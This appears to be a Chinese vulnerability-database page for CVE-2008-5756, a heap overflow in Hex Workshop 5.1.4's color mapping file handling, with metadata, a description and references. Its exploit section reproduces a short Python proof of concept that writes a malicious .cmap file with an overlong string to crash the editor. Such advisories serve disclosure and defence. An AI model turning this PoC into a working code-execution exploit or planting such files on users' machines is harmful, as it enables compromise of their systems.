Hex Workshop CMAP文件处理堆溢出漏洞

漏洞ID	1117145	漏洞类型	缓冲区溢出
发布时间	2008-12-28	更新时间	2009-01-29
CVE编号	CVE-2008-5756	CNNVD-ID	CNNVD-200812-479
漏洞平台	Windows	CVSS评分	9.3

|漏洞来源

https://www.exploit-db.com/exploits/7592
https://cxsecurity.com/issue/WLB-2009010103
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200812-479

|漏洞详情

HexWorkshop是BreakPoint公司的一款十六进制编辑器，它能够处理十六进制编辑、插入、填充、删除等操作。如果用户使用HexWorkshop打开了包含有超长16进制序列的恶意颜色映射(CMAP)文件的话，就可能触发堆溢出，导致执行任意指令。

|漏洞EXP

# Hex Workshop 5.1.4 (Color Mapping File) Local Buffer Overflow Poc
# other versions are affected 
# 
# By:Encrypt3d.M!nd
# Merry Christmas & Happy New Year 2009
#
# Greetz:-=Mizo=-(Perra :-l),L!0N,El Mariachi,MiNi SpIder,GGY,and all my friends
################################################################################
#
# Just import (enc.cmap) From (Tools>Color Mapping) And See What Happen ^_^
# I Think it's Easy To Exploit but need some work *_^

chars = "A"*4500

foot = "\x20\x3D\x20\x52\x47\x42\x28\x30\x2C\x20\x30\x2C\x20\x30\x29\x2C\x20\x52\x47\x42\x28\x31\x36\x30\x2C\x20\x31\x36\x30\x2C\x20\x31\x36\x30\x29"

file=open('enc.cmap','w+')
file.write("\x22"+chars+"\x22"+foot)
file.close()

# milw0rm.com [2008-12-28]

|参考资料

来源:XF
名称:hexworkshop-cmap-bo(47630)
链接:http://xforce.iss.net/xforce/xfdb/47630
来源:BID
名称:33023
链接:http://www.securityfocus.com/bid/33023
来源:MILW0RM
名称:7592
链接:http://www.milw0rm.com/exploits/7592
来源:VUPEN
名称:ADV-2008-3519
链接:http://www.frsirt.com/english/advisories/2008/3519
来源:SREASON
名称:4838
链接:http://securityreason.com/securityalert/4838
来源:SECUNIA
名称:33327
链接:http://secunia.com/advisories/33327

Hex Workshop CMAP文件处理堆溢出漏洞

|漏洞来源

|漏洞详情

|漏洞EXP

|参考资料

检索漏洞

相关漏洞